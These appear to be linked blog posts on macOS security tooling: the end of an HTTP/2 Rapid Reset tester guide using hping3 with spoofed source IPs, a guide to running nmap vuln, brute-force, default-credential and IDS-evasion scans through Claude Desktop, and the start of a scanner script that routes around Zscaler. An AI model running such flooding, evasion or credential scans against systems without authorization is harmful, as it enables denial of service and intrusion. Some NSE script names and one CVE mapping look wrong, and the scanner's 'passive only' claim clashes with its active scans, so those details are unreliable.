  5. Gradual escalation: Start with conservative parameters and increase gradually
  6. Document results: Keep records of test results and any configuration changes
  7. Have rollback plans: Be prepared to quickly disable testing if issues arise

Troubleshooting on macOS

Error: “hping3 is not installed”

Install hping3 using Homebrew:

brew install hping

Error: “Operation not permitted”

Make sure you are running with sudo:

sudo python3 http2rapidresettester_macos.py [options]

Error: “No route to host”

Check your network connectivity:

ping example.com
traceroute example.com

Verify your network interface is up:

ifconfig en0

Packets Not Being Sent

Possible causes and solutions:

  1. Firewall blocking: Temporarily disable firewall or add exception
  2. Interface not active: Check ifconfig output
  3. Permission issues: Ensure running with sudo
  4. Wrong interface: Specify interface with hping3 using i flag

Low Packet Rate

Performance optimization tips:

  • Use wired Ethernet instead of WiFi
  • Close other network intensive applications
  • Reduce packet rate target with --packetrate
  • Use smaller CIDR blocks

Monitoring Your Tests

Using tcpdump

Monitor packets in real time:

# Watch SYN packets
sudo tcpdump -i en0 'tcp[tcpflags] & tcp-syn != 0' -n

# Watch RST packets
sudo tcpdump -i en0 'tcp[tcpflags] & tcp-rst != 0' -n

# Watch specific host and port
sudo tcpdump -i en0 host example.com and port 443 -n

# Save to file for later analysis
sudo tcpdump -i en0 -w test_capture.pcap host example.com

Using Wireshark

For detailed packet analysis:

# Install Wireshark
brew install --cask wireshark

# Run Wireshark
sudo wireshark

# Or use tshark for command line
tshark -i en0 -f "host example.com"

Activity Monitor

Monitor system resources during testing:

  1. Open Activity Monitor (Applications > Utilities > Activity Monitor)
  2. Select “Network” tab
  3. Watch “Packets in” and “Packets out”
  4. Monitor “Data sent/received”
  5. Check CPU usage of Python process

Server Side Monitoring

On your target server, monitor:

# Connection states
netstat -an | grep :443 | awk '{print $6}' | sort | uniq -c

# Active connections count
netstat -an | grep ESTABLISHED | wc -l

# SYN_RECV connections
netstat -an | grep SYN_RECV | wc -l

# System resources
top -l 1 | head -10

Understanding IP Spoofing with hping3

How It Works

hping3 creates raw packets at the network layer, allowing you to specify arbitrary source IP addresses. This bypasses normal TCP/IP stack restrictions.

Network Requirements

For IP spoofing to work effectively:

  • Local networks: Works best on LANs you control
  • Direct routing: Requires direct layer 2 access
  • No NAT interference: NAT devices may rewrite source addresses
  • Router configuration: Some routers filter spoofed packets (BCP 38)

Testing Without Spoofing

If IP spoofing is not working in your environment:

# Test without CIDR block
sudo python3 http2rapidresettester_macos.py --host example.com --packets 1000

# This still validates:
# - Rate limiting configuration
# - Stream management
# - Server resilience
# - Resource consumption patterns

Advanced Configuration Options

Custom Packet Timing

# Slower, more stealthy testing
sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --packets 500 \
    --burstdelay 0.1  # 100ms between bursts

# Faster, more aggressive
sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --packets 1000 \
    --burstdelay 0.001  # 1ms between bursts

Custom RST to SYN Ratio

# More SYN packets (mimics connection attempts)
sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --packets 1000 \
    --resetratio 0.3  # 1 RST for every 3 SYN

# Equal SYN and RST (classic rapid reset)
sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --packets 1000 \
    --resetratio 1.0

Targeting Different Ports

# Test HTTPS (port 443)
sudo python3 http2rapidresettester_macos.py --host example.com --port 443

# Test HTTP/2 on custom port
sudo python3 http2rapidresettester_macos.py --host example.com --port 8443

# Test load balancer
sudo python3 http2rapidresettester_macos.py --host lb.example.com --port 443

Understanding the Attack Surface

When testing your infrastructure:

  1. Test all HTTP/2 endpoints: Web servers, load balancers, API gateways
  2. Verify CDN protection: Test both origin and CDN endpoints
  3. Test direct vs proxied: Compare protection at different layers
  4. Validate rate limiting: Ensure limits trigger at expected thresholds
  5. Confirm monitoring: Verify alerts trigger correctly

Conclusion

The HTTP/2 Rapid Reset vulnerability represents a significant threat to web infrastructure, but with proper patching, configuration, and monitoring, you can effectively protect your systems. This macOS optimized testing script using hping3 allows you to validate your defenses in a controlled manner with reliable IP spoofing capabilities across different network environments.

Remember that security is an ongoing process. Regularly:

  • Update your web server and proxy software
  • Review and adjust HTTP/2 configuration limits
  • Monitor for unusual traffic patterns
  • Test your defenses against emerging threats

By staying vigilant and proactive, you can maintain a resilient web presence capable of withstanding sophisticated DDoS attacks.

Additional Resources


This blog post and testing script are provided for educational and defensive security purposes only. Always obtain proper authorization before testing systems you do not own.

0
0

MacOs: Deep Dive into NMAP using Claude Desktop with an NMAP MCP

Introduction

NMAP (Network Mapper) is one of the most powerful and versatile network scanning tools available for security professionals, system administrators, and ethical hackers. When combined with Claude through the Model Context Protocol (MCP), it becomes an even more powerful tool, allowing you to leverage AI to intelligently analyze scan results, suggest scanning strategies, and interpret complex network data.

In this deep dive, we’ll explore how to set up NMAP with Claude Desktop using an MCP server, and demonstrate 20+ comprehensive vulnerability checks and reconnaissance techniques you can perform using natural language prompts.

Legal Disclaimer: Only scan systems and networks you own or have explicit written permission to test. Unauthorized scanning may be illegal in your jurisdiction.

Prerequisites

  • macOS, Linux, or Windows with WSL
  • Basic understanding of networking concepts
  • Permission to scan target systems
  • Claude Desktop installed

Part 1: Installation and Setup

Step 1: Install NMAP

On macOS:

# Using Homebrew
brew install nmap

# Verify installation

On Linux (Ubuntu/Debian):

Step 2: Install Node.js (Required for MCP Server)

The NMAP MCP server requires Node.js to run.

Mac OS:

brew install node
node --version
npm --version

Step 3: Install the NMAP MCP Server

The most popular NMAP MCP server is available on GitHub. We’ll install it globally:

cd ~/
rm -rf nmap-mcp-server
git clone https://github.com/PhialsBasement/nmap-mcp-server.git
cd nmap-mcp-server
npm install
npm run build

Step 4: Configure Claude Desktop

Edit the Claude Desktop configuration file to add the NMAP MCP server.

On macOS:

CONFIG_FILE="$HOME/Library/Application Support/Claude/claude_desktop_config.json"
USERNAME=$(whoami)

cp "$CONFIG_FILE" "$CONFIG_FILE.backup"

python3 << 'EOF'
import json
import os

config_file = os.path.expanduser("~/Library/Application Support/Claude/claude_desktop_config.json")
username = os.environ['USER']

with open(config_file, 'r') as f:
config = json.load(f)

if 'mcpServers' not in config:
config['mcpServers'] = {}

config['mcpServers']['nmap'] = {
"command": "node",
"args": [
f"/Users/{username}/nmap-mcp-server/dist/index.js"
],
"env": {}
}

with open(config_file, 'w') as f:
json.dump(config, f, indent=2)

print("nmap server added to Claude Desktop config!")
print(f"Backup saved to: {config_file}.backup")
EOF


Step 5: Restart Claude Desktop

Close and reopen Claude Desktop. You should see the NMAP MCP server connected in the bottom-left corner.

Part 2: Understanding NMAP MCP Capabilities

Once configured, Claude can execute NMAP scans through the MCP server. The server typically provides:

  • Host discovery scans
  • Port scanning (TCP/UDP)
  • Service version detection
  • OS detection
  • Script scanning (NSE – NMAP Scripting Engine)
  • Output parsing and interpretation

Part 3: 20 Most Common Vulnerability Checks

For these examples, we’ll use a hypothetical target domain: example-target.com (replace with your authorized target).

1. Basic Host Discovery and Open Ports

Prompt:

Scan example-target.com to discover if the host is up and identify all open ports (1-1000). Use a TCP SYN scan for speed.

What this does: Performs a fast SYN scan on the first 1000 ports to quickly identify open services.

Expected NMAP command:

nmap -sS -p 1-1000 example-target.com

2. Comprehensive Port Scan (All 65535 Ports)

Prompt:

Perform a comprehensive scan of all 65535 TCP ports on example-target.com to identify any services running on non-standard ports.

What this does: Scans every possible TCP port – time-consuming but thorough.

Expected NMAP command:

nmap -p- example-target.com

3. Service Version Detection

Prompt:

Scan the top 1000 ports on example-target.com and detect the exact versions of services running on open ports. This will help identify outdated software.

What this does: Probes open ports to determine service/version info, crucial for finding known vulnerabilities.

Expected NMAP command:

nmap -sV example-target.com

4. Operating System Detection

Prompt:

Detect the operating system running on example-target.com using TCP/IP stack fingerprinting. Include OS detection confidence levels.

What this does: Analyzes network responses to guess the target OS.

Expected NMAP command:

nmap -O example-target.com

5. Aggressive Scan (OS + Version + Scripts + Traceroute)

Prompt:

Run an aggressive scan on example-target.com that includes OS detection, version detection, script scanning, and traceroute. This is comprehensive but noisy.

What this does: Combines multiple detection techniques for maximum information.

Expected NMAP command:

nmap -A example-target.com

6. Vulnerability Scanning with NSE Scripts

Prompt:

Scan example-target.com using NMAP's vulnerability detection scripts to check for known CVEs and security issues in running services.

What this does: Uses NSE scripts from the ‘vuln’ category to detect known vulnerabilities.

Expected NMAP command:

nmap --script vuln example-target.com

7. SSL/TLS Security Analysis

Prompt:

Analyze SSL/TLS configuration on example-target.com (port 443). Check for weak ciphers, certificate issues, and SSL vulnerabilities like Heartbleed and POODLE.

What this does: Comprehensive SSL/TLS security assessment.

Expected NMAP command:

nmap -p 443 --script ssl-enum-ciphers,ssl-cert,ssl-heartbleed,ssl-poodle example-target.com

8. HTTP Security Headers and Vulnerabilities

Prompt:

Check example-target.com's web server (ports 80, 443, 8080) for security headers, common web vulnerabilities, and HTTP methods allowed.

What this does: Tests for missing security headers, dangerous HTTP methods, and common web flaws.

Expected NMAP command:

nmap -p 80,443,8080 --script http-security-headers,http-methods,http-csrf,http-stored-xss example-target.com

Prompt:

Scan example-target.com for SMB vulnerabilities including MS17-010 (EternalBlue), SMB signing issues, and accessible shares.

What this does: Critical for identifying Windows systems vulnerable to ransomware exploits.

Expected NMAP command:

nmap -p 445 --script smb-vuln-ms17-010,smb-vuln-*,smb-enum-shares example-target.com

10. SQL Injection Testing

Prompt:

Test web applications on example-target.com (ports 80, 443) for SQL injection vulnerabilities in common web paths and parameters.

What this does: Identifies potential SQL injection points.

Expected NMAP command:

nmap -p 80,443 --script http-sql-injection example-target.com

11. DNS Zone Transfer Vulnerability

Prompt:

Test if example-target.com's DNS servers allow unauthorized zone transfers, which could leak internal network information.

What this does: Attempts AXFR zone transfer – a serious misconfiguration if allowed.

Expected NMAP command:

nmap --script dns-zone-transfer --script-args dns-zone-transfer.domain=example-target.com -p 53 example-target.com

12. SSH Security Assessment

Prompt:

Analyze SSH configuration on example-target.com (port 22). Check for weak encryption algorithms, host keys, and authentication methods.

What this does: Identifies insecure SSH configurations.

Expected NMAP command:

nmap -p 22 --script ssh-auth-methods,ssh-hostkey,ssh2-enum-algos example-target.com

Prompt:

Check if example-target.com's FTP server (port 21) allows anonymous login and scan for FTP-related vulnerabilities.

What this does: Tests for anonymous FTP access and common FTP security issues.

Expected NMAP command:

nmap -p 21 --script ftp-anon,ftp-vuln-cve2010-4221,ftp-bounce example-target.com

Prompt:

Scan example-target.com's email servers (ports 25, 110, 143, 587, 993, 995) for open relays, STARTTLS support, and vulnerabilities.

What this does: Comprehensive email server security check.

Expected NMAP command:

nmap -p 25,110,143,587,993,995 --script smtp-open-relay,smtp-enum-users,ssl-cert example-target.com

15. Database Server Exposure

Prompt:

Check if example-target.com has publicly accessible database servers (MySQL, PostgreSQL, MongoDB, Redis) and test for default credentials.

What this does: Identifies exposed databases, a critical security issue.

Expected NMAP command:

nmap -p 3306,5432,27017,6379 --script mysql-empty-password,pgsql-brute,mongodb-databases,redis-info example-target.com

16. WordPress Security Scan

Prompt:

If example-target.com runs WordPress, enumerate plugins, themes, and users, and check for known vulnerabilities.

What this does: WordPress-specific security assessment.

Expected NMAP command:

nmap -p 80,443 --script http-wordpress-enum,http-wordpress-users example-target.com

17. XML External Entity (XXE) Vulnerability

Prompt:

Test web services on example-target.com for XML External Entity (XXE) injection vulnerabilities.

What this does: Identifies XXE flaws in XML parsers.

Expected NMAP command:

nmap -p 80,443 --script http-vuln-cve2017-5638 example-target.com

18. SNMP Information Disclosure

Prompt:

Scan example-target.com for SNMP services (UDP port 161) and attempt to extract system information using common community strings.

What this does: SNMP can leak sensitive system information.

Expected NMAP command:

nmap -sU -p 161 --script snmp-brute,snmp-info example-target.com

19. RDP Security Assessment

Prompt:

Check if Remote Desktop Protocol (RDP) on example-target.com (port 3389) is vulnerable to known exploits like BlueKeep (CVE-2019-0708).

What this does: Critical Windows remote access security check.

Expected NMAP command:

nmap -p 3389 --script rdp-vuln-ms12-020,rdp-enum-encryption example-target.com

20. API Endpoint Discovery and Testing

Prompt:

Discover API endpoints on example-target.com and test for common API vulnerabilities including authentication bypass and information disclosure.

What this does: Identifies REST APIs and tests for common API security issues.

Expected NMAP command:

nmap -p 80,443,8080,8443 --script http-methods,http-auth-finder,http-devframework example-target.com

Part 4: Deep Dive Exercises

Deep Dive Exercise 1: Complete Web Application Security Assessment

Scenario: You need to perform a comprehensive security assessment of a web application running at webapp.example-target.com.

Claude Prompt:

I need a complete security assessment of webapp.example-target.com. Please:

1. First, discover all open ports and running services
2. Identify the web server software and version
3. Check for SSL/TLS vulnerabilities and certificate issues
4. Test for common web vulnerabilities (XSS, SQLi, CSRF)
5. Check security headers (CSP, HSTS, X-Frame-Options, etc.)
6. Enumerate web directories and interesting files
7. Test for backup file exposure (.bak, .old, .zip)
8. Check for sensitive information in robots.txt and sitemap.xml
9. Test HTTP methods for dangerous verbs (PUT, DELETE, TRACE)
10. Provide a prioritized summary of findings with remediation advice

Use timing template T3 (normal) to avoid overwhelming the target.

What Claude will do:

Claude will execute multiple NMAP scans in sequence, starting with discovery and progressively getting more detailed. Example commands it might run:

# Phase 1: Discovery
nmap -sV -T3 webapp.example-target.com

# Phase 2: SSL/TLS Analysis
nmap -p 443 -T3 --script ssl-cert,ssl-enum-ciphers,ssl-known-key,ssl-heartbleed,ssl-poodle,ssl-ccs-injection webapp.example-target.com

# Phase 3: Web Vulnerability Scanning
nmap -p 80,443 -T3 --script http-security-headers,http-csrf,http-sql-injection,http-stored-xss,http-dombased-xss webapp.example-target.com

# Phase 4: Directory and File Enumeration
nmap -p 80,443 -T3 --script http-enum,http-backup-finder webapp.example-target.com

# Phase 5: HTTP Methods Testing
nmap -p 80,443 -T3 --script http-methods --script-args http-methods.test-all webapp.example-target.com

Learning Outcomes:

  • Understanding layered security assessment methodology
  • How to interpret multiple scan results holistically
  • Prioritization of security findings by severity
  • Claude’s ability to correlate findings across multiple scans

Deep Dive Exercise 2: Network Perimeter Reconnaissance

Scenario: You’re assessing the security perimeter of an organization with the domain company.example-target.com and a known IP range 198.51.100.0/24.

Claude Prompt:

Perform comprehensive network perimeter reconnaissance for company.example-target.com (IP range 198.51.100.0/24). I need to:

1. Discover all live hosts in the IP range
2. For each live host, identify:
   - Operating system
   - All open ports (full 65535 range)
   - Service versions
   - Potential vulnerabilities
3. Map the network topology and identify:
   - Firewalls and filtering
   - DMZ hosts vs internal hosts
   - Critical infrastructure (DNS, mail, web servers)
4. Test for common network misconfigurations:
   - Open DNS resolvers
   - Open mail relays
   - Unauthenticated database access
   - Unencrypted management protocols (Telnet, FTP)
5. Provide a network map and executive summary

Use slow timing (T2) to minimize detection risk and avoid false positives.

What Claude will do:

# Phase 1: Host Discovery
nmap -sn -T2 198.51.100.0/24

# Phase 2: OS Detection on Live Hosts
nmap -O -T2 198.51.100.0/24

# Phase 3: Comprehensive Port Scan (may suggest splitting into chunks)
nmap -p- -T2 198.51.100.0/24

# Phase 4: Service Version Detection
nmap -sV -T2 198.51.100.0/24

# Phase 5: Specific Service Checks
nmap -p 53 --script dns-recursion 198.51.100.0/24
nmap -p 25 --script smtp-open-relay 198.51.100.0/24
nmap -p 3306,5432,27017 --script mysql-empty-password,pgsql-brute,mongodb-databases 198.51.100.0/24
nmap -p 23,21 198.51.100.0/24

# Phase 6: Vulnerability Scanning on Critical Hosts
nmap --script vuln -T2 [critical-hosts]

Learning Outcomes:

  • Large-scale network scanning strategies
  • How to handle and analyze results from multiple hosts
  • Network segmentation analysis
  • Risk assessment across an entire network perimeter
  • Understanding firewall and filtering detection

Deep Dive Exercise 3: Advanced Vulnerability Research – Zero-Day Hunting

Scenario: You’ve discovered a host running potentially vulnerable services and want to do deep reconnaissance to identify potential zero-day vulnerabilities or chained exploits.

Claude Prompt:

I've found a server at secure-server.example-target.com that's running multiple services. I need advanced vulnerability research:

1. Aggressive version fingerprinting of all services
2. Check for version-specific CVEs in detected software
3. Look for unusual port combinations that might indicate custom applications
4. Test for default credentials on all identified services
5. Check for known backdoors in the detected software versions
6. Test for authentication bypass vulnerabilities
7. Look for information disclosure issues (version strings, debug info, error messages)
8. Test for timing attacks and race conditions
9. Analyze for possible exploit chains (e.g., LFI -> RCE)
10. Provide detailed analysis with CVSS scores and exploit availability

Run this aggressively (-T4) as we have permission for intensive testing.

What Claude will do:

# Phase 1: Aggressive Fingerprinting
nmap -sV --version-intensity 9 -T4 secure-server.example-target.com

# Phase 2: All Vulnerability Scripts
nmap --script vuln,exploit -T4 secure-server.example-target.com

# Phase 3: Default Credential Testing
nmap --script auth -T4 secure-server.example-target.com

# Phase 4: Backdoor Detection
nmap --script backdoor-check,unusual-port -T4 secure-server.example-target.com

# Phase 5: Authentication Testing
nmap --script auth-bypass,brute -T4 secure-server.example-target.com

# Phase 6: Information Disclosure
nmap --script banner,http-errors,http-git,http-svn-enum -T4 secure-server.example-target.com

# Phase 7: Service-Specific Deep Dives
# (Claude will run targeted scripts based on discovered services)

After scans, Claude will:

  • Cross-reference detected versions with CVE databases
  • Explain potential exploit chains
  • Provide PoC (Proof of Concept) suggestions
  • Recommend remediation priorities
  • Suggest additional manual testing techniques

Learning Outcomes:

  • Advanced NSE scripting capabilities
  • How to correlate vulnerabilities for exploit chains
  • Understanding vulnerability severity and exploitability
  • Version-specific vulnerability research
  • Claude’s ability to provide context from its training data about specific CVEs

Part 5: Wide-Ranging Reconnaissance Exercises

Exercise 5.1: Subdomain Discovery and Mapping

Prompt:

Help me discover all subdomains of example-target.com and create a complete map of their infrastructure. For each subdomain found:
- Resolve its IP addresses
- Check if it's hosted on the same infrastructure
- Identify the services running
- Note any interesting or unusual findings

Also check for common subdomain patterns like api, dev, staging, admin, etc.

What this reveals: Shadow IT, forgotten dev servers, API endpoints, and the organization’s infrastructure footprint.

Exercise 5.2: API Security Testing

Prompt:

I've found an API at api.example-target.com. Please:
1. Identify the API type (REST, GraphQL, SOAP)
2. Discover all available endpoints
3. Test authentication mechanisms
4. Check for rate limiting
5. Test for IDOR (Insecure Direct Object References)
6. Look for excessive data exposure
7. Test for injection vulnerabilities
8. Check API versioning and test old versions for vulnerabilities
9. Verify CORS configuration
10. Test for JWT vulnerabilities if applicable

Exercise 5.3: Cloud Infrastructure Detection

Prompt:

Scan example-target.com to identify if they're using cloud infrastructure (AWS, Azure, GCP). Look for:
- Cloud-specific IP ranges
- S3 buckets or blob storage
- Cloud-specific services (CloudFront, Azure CDN, etc.)
- Misconfigured cloud resources
- Storage bucket permissions
- Cloud metadata services exposure

Exercise 5.4: IoT and Embedded Device Discovery

Prompt:

Scan the network 192.168.1.0/24 for IoT and embedded devices such as:
- IP cameras
- Smart TVs
- Printers
- Network attached storage (NAS)
- Home automation systems
- Industrial control systems (ICS/SCADA if applicable)

Check each device for:
- Default credentials
- Outdated firmware
- Unencrypted communications
- Exposed management interfaces

Exercise 5.5: Checking for Known Vulnerabilities and Old Software

Prompt:

Perform a comprehensive audit of example-target.com focusing on outdated and vulnerable software:

1. Detect exact versions of all running services
2. For each service, check if it's end-of-life (EOL)
3. Identify known CVEs for each version detected
4. Prioritize findings by:
   - CVSS score
   - Exploit availability
   - Exposure (internet-facing vs internal)
5. Check for:
   - Outdated TLS/SSL versions
   - Deprecated cryptographic algorithms
   - Unpatched web frameworks
   - Old CMS versions (WordPress, Joomla, Drupal)
   - Legacy protocols (SSLv3, TLS 1.0, weak ciphers)
6. Generate a remediation roadmap with version upgrade recommendations

Expected approach:

# Detailed version detection
nmap -sV --version-intensity 9 example-target.com

# Check for versionable services
nmap --script version,http-server-header,http-generator example-target.com

# SSL/TLS testing
nmap -p 443 --script ssl-cert,ssl-enum-ciphers,sslv2,ssl-date example-target.com

# CMS detection
nmap -p 80,443 --script http-wordpress-enum,http-joomla-brute,http-drupal-enum example-target.com

Claude will then analyze the results and provide:

  • A table of detected software with current versions and latest versions
  • CVE listings with severity scores
  • Specific upgrade recommendations
  • Risk assessment for each finding

Part 6: Advanced Tips and Techniques

6.1 Optimizing Scan Performance

Timing Templates:

  • -T0 (Paranoid): Extremely slow, for IDS evasion
  • -T1 (Sneaky): Slow, minimal detection risk
  • -T2 (Polite): Slower, less bandwidth intensive
  • -T3 (Normal): Default, balanced approach
  • -T4 (Aggressive): Faster, assumes good network
  • -T5 (Insane): Extremely fast, may miss results

Prompt:

Explain when to use each NMAP timing template and demonstrate the difference by scanning example-target.com with T2 and T4 timing.

6.2 Evading Firewalls and IDS

Prompt:

Scan example-target.com using techniques to evade firewalls and intrusion detection systems:
- Fragment packets
- Use decoy IP addresses
- Randomize scan order
- Use idle scan if possible
- Spoof MAC address (if on local network)
- Use source port 53 or 80 to bypass egress filtering

Expected command examples:

# Fragmented packets
nmap -f example-target.com

# Decoy scan
nmap -D RND:10 example-target.com

# Randomize hosts
nmap --randomize-hosts example-target.com

# Source port spoofing
nmap --source-port 53 example-target.com

6.3 Creating Custom NSE Scripts with Claude

Prompt:

Help me create a custom NSE script that checks for a specific vulnerability in our custom application running on port 8080. The vulnerability is that the /debug endpoint returns sensitive configuration data without authentication.

Claude can help you write Lua scripts for NMAP’s scripting engine!

6.4 Output Parsing and Reporting

Prompt:

Scan example-target.com and save results in all available formats (normal, XML, grepable, script kiddie). Then help me parse the XML output to extract just the critical and high severity findings for a report.

Expected command:

nmap -oA scan_results example-target.com

Claude can then help you parse the XML file programmatically.

Part 7: Responsible Disclosure and Next Steps

After Finding Vulnerabilities

  1. Document everything: Keep detailed records of your findings
  2. Prioritize by risk: Use CVSS scores and business impact
  3. Responsible disclosure: Follow the organization’s security policy
  4. Remediation tracking: Help create an action plan
  5. Verify fixes: Re-test after patches are applied

Using Claude for Post-Scan Analysis

Prompt:

I've completed my NMAP scans and found 15 vulnerabilities. Here are the results: [paste scan output]. 

Please:
1. Categorize by severity (Critical, High, Medium, Low, Info)
2. Explain each vulnerability in business terms
3. Provide remediation steps for each
4. Suggest a remediation priority order
5. Draft an executive summary for management
6. Create technical remediation tickets for the engineering team

Claude excels at translating technical scan results into actionable business intelligence.

Part 8: Continuous Monitoring with NMAP and Claude

Set up regular scanning routines and use Claude to track changes:

Prompt:

Create a baseline scan of example-target.com and save it. Then help me set up a cron job (or scheduled task) to run weekly scans and alert me to any changes in:
- New open ports
- Changed service versions
- New hosts discovered
- Changes in vulnerabilities detected

Conclusion

Combining NMAP’s powerful network scanning capabilities with Claude’s AI-driven analysis creates a formidable security assessment toolkit. The Model Context Protocol bridges these tools seamlessly, allowing you to:

  • Express complex scanning requirements in natural language
  • Get intelligent interpretation of scan results
  • Receive contextual security advice
  • Automate repetitive reconnaissance tasks
  • Learn security concepts through interactive exploration

Key Takeaways:

  1. Always get permission before scanning any network or system
  2. Start with gentle scans and progressively get more aggressive
  3. Use timing controls to avoid overwhelming targets or triggering alarms
  4. Correlate multiple scans for a complete security picture
  5. Leverage Claude’s knowledge to interpret results and suggest next steps
  6. Document everything for compliance and knowledge sharing
  7. Keep NMAP updated to benefit from the latest scripts and capabilities

The examples provided in this guide demonstrate just a fraction of what’s possible when combining NMAP with AI assistance. As you become more comfortable with this workflow, you’ll discover new ways to leverage Claude’s understanding to make your security assessments more efficient and comprehensive.

Additional Resources

About the Author: This guide was created to help security professionals and system administrators leverage AI assistance for more effective network reconnaissance and vulnerability assessment.

Last Updated: 2025-11-21

Version: 1.0

0
0

Macbook: Enhanced Domain Vulnerability Scanner

Below is a fairly comprehensive passive penetration testing script with vulnerability scanning, API testing, and detailed reporting.

Features

  • DNS & SSL/TLS Analysis – Complete DNS enumeration, certificate inspection, cipher analysis
  • Port & Vulnerability Scanning – Service detection, NMAP vuln scripts, outdated software detection
  • Subdomain Discovery – Certificate transparency log mining
  • API Security Testing – Endpoint discovery, permission testing, CORS analysis
  • Asset Discovery – Web technology detection, CMS identification
  • Firewall Testing – hping3 TCP/ICMP tests (if available)
  • Network Bypass – Uses en0 interface to bypass Zscaler
  • Debug Mode – Comprehensive logging enabled by default

Installation

Required Dependencies

# macOS
brew install nmap openssl bind curl jq

# Linux
sudo apt-get install nmap openssl dnsutils curl jq

Optional Dependencies

# macOS
brew install hping

# Linux
sudo apt-get install hping3 nikto

Usage

Basic Syntax

./security_scanner_enhanced.sh -d DOMAIN [OPTIONS]

Options

  • -d DOMAIN – Target domain (required)
  • -s – Enable subdomain scanning
  • -m NUM – Max subdomains to scan (default: 10)
  • -v – Enable vulnerability scanning
  • -a – Enable API discovery and testing
  • -h – Show help

Examples:

# Basic scan
./security_scanner_enhanced.sh -d example.com

# Full scan with all features
./security_scanner_enhanced.sh -d example.com -s -m 20 -v -a

# Vulnerability assessment only
./security_scanner_enhanced.sh -d example.com -v

# API security testing
./security_scanner_enhanced.sh -d example.com -a

Network Configuration

Default Interface: en0 (bypasses Zscaler)

To change the interface, edit line 24:

NETWORK_INTERFACE="en0"  # Change to your interface

The script automatically falls back to default routing if the interface is unavailable.

Debug Mode

Debug mode is enabled by default and shows:

  • Dependency checks
  • Network interface status
  • Command execution details
  • Scan progress
  • File operations

Debug messages appear in cyan with [DEBUG] prefix.

To disable, edit line 27:

DEBUG=false

Output

Each scan creates a timestamped directory: scan_example.com_20251016_191806/

Key Files

  • executive_summary.md – High-level findings
  • technical_report.md – Detailed technical analysis
  • vulnerability_report.md – Vulnerability assessment (if -v used)
  • api_security_report.md – API security findings (if -a used)
  • dns_*.txt – DNS records
  • ssl_*.txt – SSL/TLS analysis
  • port_scan_*.txt – Port scan results
  • subdomains_discovered.txt – Found subdomains (if -s used)

Scan Duration

Scan TypeDuration
Basic2-5 min
With subdomains+1-2 min/subdomain
With vulnerabilities+10-20 min
Full scan15-30 min

Troubleshooting

Missing dependencies

# Install required tools
brew install nmap openssl bind curl jq  # macOS
sudo apt-get install nmap openssl dnsutils curl jq  # Linux

Interface not found

# Check available interfaces
ifconfig

# Script will automatically fall back to default routing

Permission errors

# Some scans may require elevated privileges
sudo ./security_scanner_enhanced.sh -d example.com

Configuration

Change scan ports (line 325)

# Default: top 1000 ports
--top-ports 1000

# Custom ports
-p 80,443,8080,8443

# All ports (slow)
-p-

Adjust subdomain limit (line 1162)

MAX_SUBDOMAINS=10  # Change as needed

Add custom API paths (line 567)

API_PATHS=(
    "/api"
    "/api/v1"
    "/custom/endpoint"  # Add yours
)

⚠️ WARNING: Only scan domains you own or have explicit permission to test. Unauthorized scanning may be illegal.

This tool performs passive reconnaissance only:

  • ✅ DNS queries, certificate logs, public web requests
  • ❌ No exploitation, brute force, or denial of service

Best Practices

  1. Obtain proper authorization before scanning
  2. Monitor progress via debug output
  3. Review all generated reports
  4. Prioritize findings by risk
  5. Schedule follow-up scans after remediation

Disclaimer: This tool is for authorized security testing only. The authors assume no liability for misuse or damage.

The Script:

cat > ./security_scanner_enhanced.sh << 'EOF'
#!/bin/zsh

################################################################################
# Enhanced Security Scanner Script v2.0
# Comprehensive security assessment with vulnerability scanning
# Includes: NMAP vuln scripts, hping3, asset discovery, API testing
# Network Interface: en0 (bypasses Zscaler)
# Debug Mode: Enabled
################################################################################

# Color codes for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
MAGENTA='\033[0;35m'
CYAN='\033[0;36m'
NC='\033[0m' # No Color

# Script version
VERSION="2.0.1"

# Network interface to use (bypasses Zscaler)
NETWORK_INTERFACE="en0"

# Debug mode flag
DEBUG=true

################################################################################
# Usage Information
################################################################################
usage() {
    cat << EOF
Enhanced Security Scanner v${VERSION}

Usage: $0 -d DOMAIN [-s] [-m MAX_SUBDOMAINS] [-v] [-a]

Options:
    -d DOMAIN           Target domain to scan (required)
    -s                  Scan subdomains (optional)
    -m MAX_SUBDOMAINS   Maximum number of subdomains to scan (default: 10)
    -v                  Enable vulnerability scanning (NMAP vuln scripts)
    -a                  Enable API discovery and testing
    -h                  Show this help message

Network Configuration:
    Interface: $NETWORK_INTERFACE (bypasses Zscaler)
    Debug Mode: Enabled

Examples:
    $0 -d example.com
    $0 -d example.com -s -m 20 -v
    $0 -d example.com -s -v -a

EOF
    exit 1
}

################################################################################
# Logging Functions
################################################################################
log_info() {
    echo -e "${BLUE}[INFO]${NC} $1"
}

log_success() {
    echo -e "${GREEN}[SUCCESS]${NC} $1"
}

log_warning() {
    echo -e "${YELLOW}[WARNING]${NC} $1"
}

log_error() {
    echo -e "${RED}[ERROR]${NC} $1"
}

log_vuln() {
    echo -e "${MAGENTA}[VULN]${NC} $1"
}

log_debug() {
    if [ "$DEBUG" = true ]; then
        echo -e "${CYAN}[DEBUG]${NC} $1"
    fi
}

################################################################################
# Check Dependencies
################################################################################
check_dependencies() {
    log_info "Checking dependencies..."
    log_debug "Starting dependency check"
    
    local missing_deps=()
    local optional_deps=()
    
    # Required dependencies
    log_debug "Checking for nmap..."
    command -v nmap >/dev/null 2>&1 || missing_deps+=("nmap")
    log_debug "Checking for openssl..."
    command -v openssl >/dev/null 2>&1 || missing_deps+=("openssl")
    log_debug "Checking for dig..."
    command -v dig >/dev/null 2>&1 || missing_deps+=("dig")
    log_debug "Checking for curl..."
    command -v curl >/dev/null 2>&1 || missing_deps+=("curl")
    log_debug "Checking for jq..."
    command -v jq >/dev/null 2>&1 || missing_deps+=("jq")
    
    # Optional dependencies
    log_debug "Checking for hping3..."
    command -v hping3 >/dev/null 2>&1 || optional_deps+=("hping3")
    log_debug "Checking for nikto..."
    command -v nikto >/dev/null 2>&1 || optional_deps+=("nikto")
    
    if [ ${#missing_deps[@]} -ne 0 ]; then
        log_error "Missing required dependencies: ${missing_deps[*]}"
        log_info "Install missing dependencies and try again"
        exit 1
    fi
    
    if [ ${#optional_deps[@]} -ne 0 ]; then
        log_warning "Missing optional dependencies: ${optional_deps[*]}"
        log_info "Some features may be limited"
    fi
    
    # Check network interface
    log_debug "Checking network interface: $NETWORK_INTERFACE"
